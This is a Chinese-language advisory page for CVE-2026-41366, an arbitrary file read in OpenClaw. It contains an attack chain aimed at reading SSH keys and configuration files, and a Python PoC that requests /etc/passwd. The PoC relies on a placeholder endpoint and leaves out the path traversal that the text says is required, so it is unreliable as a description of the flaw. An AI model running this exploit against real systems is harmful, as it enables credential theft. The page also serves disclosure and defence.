CVE-2026-41366 CVSS 5.5 中危

CVE-2026-41366 OpenClaw 任意文件读取漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41366

漏洞类型

任意文件读取

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.3.31之前的版本中存在本地根目录自我白名单漏洞。该漏洞位于`appendLocalMediaParentRoots`函数，由于对媒体父目录验证不当，允许模型发起的请求绕过安全限制。攻击者可利用此缺陷读取主机上的任意文件，导致凭据泄露及敏感数据被访问。

技术细节

该漏洞的核心在于OpenClaw处理媒体路径时的逻辑缺陷。在`appendLocalMediaParentRoots`函数中，程序未能正确验证父目录路径，导致存在“自我白名单”机制绕过风险。攻击者无需用户交互，仅需低权限本地访问即可构造特定的恶意请求。通过操纵媒体路径参数，攻击者可以将目标系统上的任意文件（如/etc/passwd或配置文件）包含在允许访问的列表中。由于CVSS向量显示机密性影响为高，攻击者成功利用后可直接获取系统敏感信息，但无法直接修改文件或拒绝服务。

攻击链分析

STEP 1

步骤1: 获取本地访问权限

攻击者获取目标系统的低权限本地访问能力（AV:L/PR:L）。

STEP 2

步骤2: 识别漏洞版本

确认目标运行的是OpenClaw 2026.3.31之前的易受攻击版本。

STEP 3

步骤3: 构造恶意请求

针对`appendLocalMediaParentRoots`函数，构造包含路径遍历参数的请求，利用自我白名单缺陷。

STEP 4

步骤4: 执行文件读取

发送请求，绕过目录验证逻辑，读取主机上的敏感文件（如SSH密钥、配置文件等）。

STEP 5

步骤5: 数据窃取

解析返回的文件内容，提取凭据或敏感信息以进行后续渗透。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# PoC for CVE-2026-41366: OpenClaw Arbitrary File Read
# Description: Exploits the self-whitelisting vulnerability in appendLocalMediaParentRoots

TARGET_URL = "http://localhost:8080/api/media/process"  # Replace with actual target endpoint
MALICIOUS_PATH = "/etc/passwd"                     # Sensitive file to read

def exploit_openclaw():
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "CVE-2026-41366-POC"
    }

    # Payload designed to bypass parent directory validation
    payload = {
        "media_request": {
            "action": "append_local_media",
            "path": MALICIOUS_PATH,
            "recursive": True
        }
    }

    try:
        print(f"[*] Attempting to read {MALICIOUS_PATH}...")
        response = requests.post(TARGET_URL, data=json.dumps(payload), headers=headers, timeout=10)

        if response.status_code == 200:
            print("[+] Exploit successful! Response content:")
            print(response.text)
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            print(response.text)

    except requests.exceptions.RequestException as e:
        print(f"[!] Connection error: {e}")

if __name__ == "__main__":
    exploit_openclaw()

影响范围

OpenClaw < 2026.3.31

防御指南

临时缓解措施

如果无法立即升级，建议通过操作系统级别的权限控制（如chroot或容器化隔离）限制OpenClaw进程的文件系统访问范围，严禁其访问/etc、/home等敏感目录，并检查相关日志是否存在异常的文件读取行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表